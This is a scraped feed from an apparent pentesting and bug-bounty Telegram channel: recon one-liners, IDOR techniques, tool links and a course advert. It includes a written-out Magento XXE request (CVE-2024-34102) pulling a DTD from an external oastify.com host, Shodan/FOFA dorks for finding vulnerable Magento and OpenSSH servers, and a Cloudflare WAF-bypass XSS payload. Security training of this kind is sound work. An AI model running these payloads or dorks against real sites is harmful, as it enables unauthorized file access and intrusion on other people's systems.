Brut Security
15.2K subscribers
965 photos
76 videos
292 files
1.01K links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: info@brutsec.com
Download Telegram
βš”οΈPentest-Windows
πŸ”°Windows11 Penetration Suite Toolkit

πŸ“ŒA Windows penetration testing environment that works out of the box.

⚠️This project was created for educational purposes and should not be used in environments without legal authorization.

πŸ”—Link: https://lnkd.in/gtX3GbR8

πŸ”–#infosec #cybersecurity #hacking #pentesting #security #infosec #cybersecurity #hacking #pentesting #security #oscp #ceh #nmap #infosec #hackingtools #networksecurity
πŸ”₯1
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ“’You can now passively enumerate all endpoints of a website with katana. (No need waybackurls)

πŸ“Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | tee endpoints



🚨You can then check the status of these endpoints or filter in order to find new vulnerabilities:

⚠Example:
echo nasa.gov | katana -passive -f qurl -pss waybackarchive,commoncrawl,alienvault | httpx -mc 200 | grep -E '\.(js|php)$' | tee specificEndpoints
πŸ‘2πŸ”₯1
πŸ’ͺ🏻Scan for Adobe Commerce & Magento - XXE

(CVE-2024-34102) discovered by Sergey Temnikov using Nuclei Template @pdnuclei

πŸ” Details: https://lnkd.in/dBy32DtY

πŸ“‘ Nuclei Template: https://lnkd.in/dUNFMUny

πŸ”§ GitHub PR: https://lnkd.in/dqu65C5i

#bugbounty #adobe #pdteam #infos
πŸ‘1
Advanced IDORs - 9 Techniques by Intigriti:

1. Exploiting Basic IDORs

How to: Modify a predictable numeric ID in the request URL or parameters.
Example: GET /user/email?userId=1002 (change userId to another value).

2. Exploiting IDORs via Parameter Pollution

How to: Inject multiple instances of the same parameter in the request.
Example: POST /update_profile with user_id=1234&user_id=5678.

3. Exploiting IDORs via JSON Globbing

How to: Manipulate JSON fields with arrays, booleans, wildcards, or large integers.
Example: { "user_id": ["1234", "5678"] } or { "user_id": "*" }.

4. Exploiting Method-Based IDORs

How to: Change the HTTP method to bypass access controls.
Example: Change GET /user/data to POST /user/data.

5. Exploiting Content-Type-Based IDORs

How to: Alter the Content-Type header to manipulate request processing.
Example: Use Content-Type: application/json instead of Content-Type: text/plain.

6. Exploiting IDORs via Deprecated API Versions

How to: Use older API versions that may lack updated security checks.
Example: Access /v1/user/data instead of /v2/user/data.

7. Exploiting IDORs in APIs that Use Static Keywords

How to: Replace keywords like current or me with numerical user IDs.
Example: Change /user/profile/current to /user/profile/1002.

8. Exploiting IDORs that Require Unpredictable IDs

How to: Find references to UUIDs or hashes in other parts of the application.
Example: Extract UUID from profile URLs like /profile/123e4567-e89b-12d3-a456-426614174000.

9. Exploiting Second-Order IDOR Vulnerabilities

How to: Manipulate stored IDs used in subsequent processes.
Example: Submit a form that stores your ID, then trigger an export process that retrieves data using that stored ID.
----------------------------------------------------------

I've never seen real-world examples for some of them, but they are definitely worth the try.

#pentesting #appsec #bugbounty #cybersecurity

Here's the full scoop: https://buff.ly/3zfhhzL
⚑️Burp Suite for Pentester

ℹ️This cheat sheet is built for Bug Bounty Hunters and penetration testers to help them hunt the vulnerabilities. It is designed such that beginners can understand the fundamentals and professionals can brush up their skills with the advanced options.

πŸ”Ή Web Scanner & Crawler
πŸ”ΉFuzzing with Intruder (Part3)
πŸ”ΉFuzzing with Intruder (Part2)
πŸ”ΉFuzzing with Intruder (Part1)
πŸ”ΉXSS Validator
πŸ”ΉConfiguring Proxy
πŸ”ΉBurp Collaborator
πŸ”ΉHackBar
πŸ”ΉBurp Sequencer
πŸ”ΉTurbo Intruder
πŸ”ΉEngagement Tools
πŸ”ΉPayload Processing Rule (Part2)
πŸ”ΉPayload Processing Rule (Part1)
πŸ”ΉBeginners Guide to Burpsuite Payloads (Part2)
πŸ”ΉBeginners Guide to Burpsuite Payloads (Part1)
πŸ”ΉEncoder & Decoder Tutorial
πŸ”ΉActive Scan++
πŸ”ΉSoftware Vulnerability Scanner
πŸ”ΉBurp’s Project Management
πŸ”ΉRepeater

πŸ”—Link: https://github.com/Ignitetechnologies/BurpSuite-For-Pentester

πŸ”–#infosec #cybersecurity #hacking #pentesting #security
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘4πŸ”₯2🫑1
πŸ”₯Magento XXE CVE-2024-34102: A newly discovered vulnerability
dubbed β€œCosmicSting” jeopardizes millions of online stores
built on Adobe Commerce and Magento platforms.

⚠️CosmicSting enables attackers to gain unauthorized access
to sensitive files, including those containing passwords.
When combined with a recent Linux bug (CVE-2024-2961),
the vulnerability can be escalated to remote code execution.

πŸ“£Dorks:
Hunter:
http://product.name="Adobe Magento"
FOFA: app="Adobe-Magento"
SHODAN: http.html:"magento-template"

▢️Video POC: https://youtu.be/rDs_Qj7K31M

πŸ”΄POC: https://github.com/th3gokul/CVE-2024-34102

⛔️Payload:
POST /rest/V1/guest-carts/1/estimate-shipping-methods HTTP/2
Content-Type: application/json
Content-Length: 192
{"address":{"totalsCollector":{"collectorList":{"totalCollector":{"sourceData":
{"data":"http://*.
oastify.com/xxe.xml","dataIsURL":true,"options":12345678}}}}}}


⚠️Tool Made By: D. Sanjai Kumar & Gokul V
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘6🀯2😱1
▢️Registration Open for July Batch: Extreme Web Application Penetration Testing

πŸ”—Registration Link: https://nas.io/brutsecurity/products/fflk

⚠️Full Course Curriculum: https://brutsec.com/WebPentesting.pdf

βœ‰οΈWhtasApp Us: https://wa.me/918945971332

ℹ️Join us for an intensive 2-month course designed for beginners with basic IT & cybersecurity knowledge!

#bugbounty #bugbountytips
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘2πŸ€”1
Who said pdf.js Cookie prompt doesn't works? πŸ€”
πŸ”₯1
This media is not supported in your browser
VIEW IN TELEGRAM
Whoever is commenting it doesn't work on latest updates of firefox, the video is for them only. No offence to anyone but you guys lack a lot of research's!
πŸ‘3❀1πŸ”₯1
cookieprompt.pdf
1.8 KB
πŸ‘2
πŸ”₯Unauthenticated Magento XXE to Privilege EscalationπŸ”₯

⚠️CosmicSting enables attackers to gain unauthorized access to sensitive files, including those containing passwords.
When combined with a recent Linux bug (CVE-2024-2961),the vulnerability can be escalated to remote code execution.

▢️Video POC: https://youtu.be/j9KiNmGbT9Q

πŸ”΄POC: https://github.com/th3gokul/CVE-2024-34102
πŸ’₯Payload: https://gist.github.com/wtf-yodhha/b4b12a09a4c2d3af0e04b74968daed5d
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ‘2😱2
Hope you guys learning from the resources which I am sharing, if you have any suggestions or questions you can do comment.

Thanks and Regards,
The Brut Security Team
β˜„οΈ
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯6πŸ‘4
When hunting for IDORs during a bug bounty program, consider the following tip:

1. Leverage archive tools: Utilize tools like Wayback Machine or specialized software like Waymore to manually archive and analyze subdomains. This can help uncover hidden or previously accessible endpoints that may now be vulnerable to IDORs.

Example usage:
python3 waymore.py -i sub.target.com -mode U -xcc

2. Extract all paths with specific keywords: After identifying potential paths, extract all URLs containing specific keywords, such as "admin" or "manager," to narrow down your search.

Example command:
cat result.txt | grep "admin"

3. Fuzzing: If you find a suspicious path but it doesn't yield any results, try fuzzing the URL with a wordlist. This can help uncover hidden or unintended parameters.

Example usage:
ffuf -u https://sub.taget.com/promo/offer/1234/FUZZ -mc 200

4. Brute force: If you find a path with a dynamic ID, consider brute-forcing the last digits or numbers. This can help uncover additional sensitive information or functionality.

Example scenario:
Found path: https://sub.taget.com/promo/offer/1234/details

Brute-force the last 3 digits: 1234


By following these steps, you can uncover hidden or unintended IDORs, leading to potential security vulnerabilities and rewards in bug bounty programs.
πŸ”₯8πŸ‘1
A payload that bypasses Cloudflare WAF

<img/src=x onError="`${x}`;alert(`Hello`);">
πŸ‘11
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯1
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ“’CSPRecon: Discover new target domains using Content Security Policy.

⚠️This project was created for educational purposes and should not be used in environments without legal authorization.

πŸ”— Download: https://github.com/edoardottt/csprecon
πŸ‘7
πŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒπŸ’ƒ
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯3🀑2
⚠️ CVE-2024-6387: Critical OpenSSH Unauthenticated RCE Flaw β€˜regreSSHion’ Exposes Millions of Linux Systems

🎯96.4 million+ Results are found on the en.fofa.info nearly year.

πŸ’₯FOFA Dork: app="OpenSSH"

πŸ”–Refer: https://lnkd.in/gkENKHPv

ℹ️POC: https://lnkd.in/gzEWNHAX

#OSINT #FOFA #openssh #bugbounty #bugbountytips #cybersecurity #infosec
πŸ”₯2
A very good morning to you guys πŸ”«πŸ”«πŸ”«πŸ”«
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯4❀‍πŸ”₯1πŸ‘1